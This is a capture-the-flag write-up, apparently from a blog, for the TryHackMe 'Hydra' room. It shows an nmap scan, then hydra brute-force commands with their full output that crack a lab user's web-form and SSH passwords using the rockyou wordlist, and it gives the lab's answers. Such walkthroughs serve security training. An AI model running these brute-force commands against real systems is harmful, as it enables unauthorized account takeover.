THM — HYDRA

7 min readNov 24, 2020

Nmap

kali@kali:~$ sudo nmap -T4 -A 10.10.88.51
[sudo] password for kali: 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-24 05:26 EST
Nmap scan report for 10.10.88.51
Host is up (0.35s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 1d:8f:d6:43:74:50:e4:6f:cb:bc:6c:f8:75:ff:9e:c9 (RSA)
|   256 bc:82:77:00:d3:1f:69:c5:e5:22:c5:f1:2a:53:b5:41 (ECDSA)
|_  256 aa:77:05:57:bd:63:82:fc:77:8e:fa:e3:97:d9:d5:16 (ED25519)
80/tcp open  http    Node.js Express framework
| http-title: Hydra Challenge
|_Requested resource was /login
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=11/24%OT=22%CT=1%CU=39163%PV=Y%DS=4%DC=T%G=Y%TM=5FBCE0
OS:13%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10C%TI=Z%CI=I%II=I%TS=8)SE
OS:Q(SP=101%GCD=1%ISR=10C%TI=Z%II=I%TS=8)SEQ(SP=101%GCD=1%ISR=10C%TI=Z%CI=I
OS:%TS=8)OPS(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O
OS:5=M508ST11NW7%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6
OS:=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 554/tcp)
HOP RTT       ADDRESS
1   99.73 ms  10.4.0.1
2   ... 3
4   412.71 ms 10.10.88.51OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.53 seconds

Using the Hydra command:

hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.88.51 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V -f

-l flag is for username, if you want to use a username list, use the flag -L and input the path to the list.
-P is for the password list, input the path to the password list.
http-post-form is the form type
“/login: In between the opening double quote and semicolon, is the web directory to the page you are attacking
username=^USER^ username is the form field and ^USER^ is where Hydra will use the list of usernames or user’s name given
password=^PASS^ password is the form field and ^PASS^ is where Hydra will use the list of passwords or user’s password given
-V for verbosity, which will list out each login attempt with passwords
-f Hydra will stop after matching the first username:password pair
-t <integer> You could also add this flag, which tells Hydra to run a certain number of tasks in parallel. By default, Hydra is running 16 tasks.

You can go to this website to have a detailed explanation on using hydra to attack web forms: https://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-online-web-form-passwords-with-thc-hydra-burp-suite-0160643/

Results:

kali@kali:~$ hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.88.51 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V -f
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-24 05:45:04
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.88.51:80/login:username=^USER^&password=^PASS^:F=incorrect
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "123456" - 1 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "12345" - 2 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "123456789" - 3 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "password" - 4 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "iloveyou" - 5 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "princess" - 6 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "1234567" - 7 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "rockyou" - 8 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "12345678" - 9 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "abc123" - 10 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "nicole" - 11 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "daniel" - 12 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "babygirl" - 13 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "monkey" - 14 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "lovely" - 15 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "jessica" - 16 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "654321" - 17 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "michael" - 18 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "ashley" - 19 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "qwerty" - 20 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "111111" - 21 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "iloveu" - 22 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "000000" - 23 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "michelle" - 24 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "tigger" - 25 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "sunshine" - 26 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "chocolate" - 27 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "password1" - 28 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "soccer" - 29 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "anthony" - 30 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "friends" - 31 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "butterfly" - 32 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "purple" - 33 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "angel" - 34 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "jordan" - 35 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "liverpool" - 36 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "justin" - 37 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "loveme" - 38 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "fuckyou" - 39 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "123123" - 40 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "football" - 41 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "secret" - 42 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "andrea" - 43 of 14344399 [child 11] (0/0)
[80][http-post-form] host: 10.10.88.51   login: molly   password: sunshine
[STATUS] attack finished for 10.10.88.51 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-24 05:45:25

Now let’s attack Molly’s ssh login.

hydra -l molly -P /usr/share/wordlists/rockyou.txt ssh://10.10.88.51 -V -f

Results:

kali@kali:~$ hydra -l molly -P /usr/share/wordlists/rockyou.txt ssh://10.10.88.51 -V -f
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-24 05:56:32
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.88.51:22/
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "123456" - 1 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "12345" - 2 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "123456789" - 3 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "password" - 4 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "iloveyou" - 5 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "princess" - 6 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "1234567" - 7 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "rockyou" - 8 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "12345678" - 9 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "abc123" - 10 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "nicole" - 11 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "daniel" - 12 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "babygirl" - 13 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "monkey" - 14 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "lovely" - 15 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "jessica" - 16 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "654321" - 17 of 14344401 [child 11] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "michael" - 18 of 14344401 [child 14] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "ashley" - 19 of 14344401 [child 0] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "qwerty" - 20 of 14344401 [child 1] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "111111" - 21 of 14344401 [child 2] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "iloveu" - 22 of 14344401 [child 3] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "000000" - 23 of 14344401 [child 4] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "michelle" - 24 of 14344401 [child 5] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "tigger" - 25 of 14344401 [child 6] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "sunshine" - 26 of 14344401 [child 7] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "chocolate" - 27 of 14344401 [child 8] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "password1" - 28 of 14344401 [child 9] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "soccer" - 29 of 14344401 [child 10] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "anthony" - 30 of 14344401 [child 12] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "friends" - 31 of 14344401 [child 13] (0/2)
[ATTEMPT] target 10.10.88.51 - login "molly" - pass "butterfly" - 32 of 14344401 [child 15] (0/2)
[22][ssh] host: 10.10.88.51   login: molly   password: butterfly
[STATUS] attack finished for 10.10.88.51 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-24 05:56:44

To connect through ssh, use the following commands:

ssh molly@10.10.88.51

Once connected, the flag2.txt file will be in your current working directory which contains the flag.

THM — HYDRA

Nmap

Written by Yikai